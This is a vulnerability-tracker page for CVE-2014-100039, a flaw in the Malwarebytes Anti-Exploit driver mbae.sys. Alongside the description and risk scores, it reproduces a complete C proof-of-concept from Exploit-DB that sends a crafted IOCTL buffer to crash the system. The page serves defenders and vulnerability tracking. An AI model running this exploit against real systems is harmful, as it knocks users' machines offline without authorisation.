CVE-2014-100039

low

Published 2015-01-13 · Modified 2026-05-06

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

3.1

Description

mbae.sys in Malwarebytes Anti-Exploit before 1.05.1.2014 allows local users to cause a denial of service (crash) via a crafted size in an unspecified IOCTL call, which triggers an out-of-bounds read. NOTE: some of these details are obtained from third party information.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-35842 dos windows c · 2 KB

Parvez Anwar · 2015-01-20

Malwarebytes Anti-Exploit 1.03.1.1220/1.04.1.1012 - Out-of-Bounds Read Denial of Service

c exploit Source: Exploit-DB

/*

Exploit Title    - MalwareBytes Anti-Exploit Out-of-bounds Read DoS
Date             - 19th January 2015
Discovered by    - Parvez Anwar (@parvezghh)
Vendor Homepage  - https://www.malwarebytes.org
Tested Version   - 1.03.1.1220, 1.04.1.1012
Driver Version   - no version set - mbae.sys
Tested on OS     - 32bit Windows XP SP3 and Windows 7 SP1
OSVDB            - http://www.osvdb.org/show/osvdb/114249
CVE ID           - CVE-2014-100039
Vendor fix url   - https://forums.malwarebytes.org/index.php?/topic/158251-malwarebytes-anti-exploit-hall-of-fame/
Fixed version    - 1.05
Fixed driver ver - no version set

*/



#include <stdio.h>
#include <windows.h>

#define BUFSIZE 25


int main(int argc, char *argv[]) 
{
    HANDLE         hDevice;
    char           devhandle[MAX_PATH];
    DWORD          dwRetBytes = 0;
    BYTE           sizebytes[4] = "\xff\xff\xff\x00";   
    BYTE           *inbuffer;


    printf("-------------------------------------------------------------------------------\n");
    printf("        MalwareBytes Anti-Exploit (mbae.sys) Out-of-bounds Read DoS            \n");
    printf("             Tested on Windows XP SP3/Windows 7 SP1 (32bit)                    \n");
    printf("-------------------------------------------------------------------------------\n\n");

    sprintf(devhandle, "\\\\.\\%s", "ESProtectionDriver");

    inbuffer = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    memset(inbuffer, 0x41, BUFSIZE);
    memcpy(inbuffer, sizebytes, sizeof(sizebytes));

    printf("\n[i] Size of total buffer being sent %d bytes", BUFSIZE);

    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
    
    if(hDevice == INVALID_HANDLE_VALUE)
    {
        printf("\n[-] Open %s device failed\n\n", devhandle);
        return -1;
    }
    else 
    {
        printf("\n[+] Open %s device successful", devhandle);
    }	

    printf("\n[~] Press any key to DoS . . .");
    getch();

    DeviceIoControl(hDevice, 0x0022e000, inbuffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL);

    printf("\n[+] DoS buffer sent\n\n");
 
    CloseHandle(hDevice);

    return 0;
}

Application impact

Vendor	Product	Versions	Fixed
malwarebytes	malwarebytes_anti-exploit	`{"endIncluding":"1.04.1.1012"}`

References

CWEs

CWE-20

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.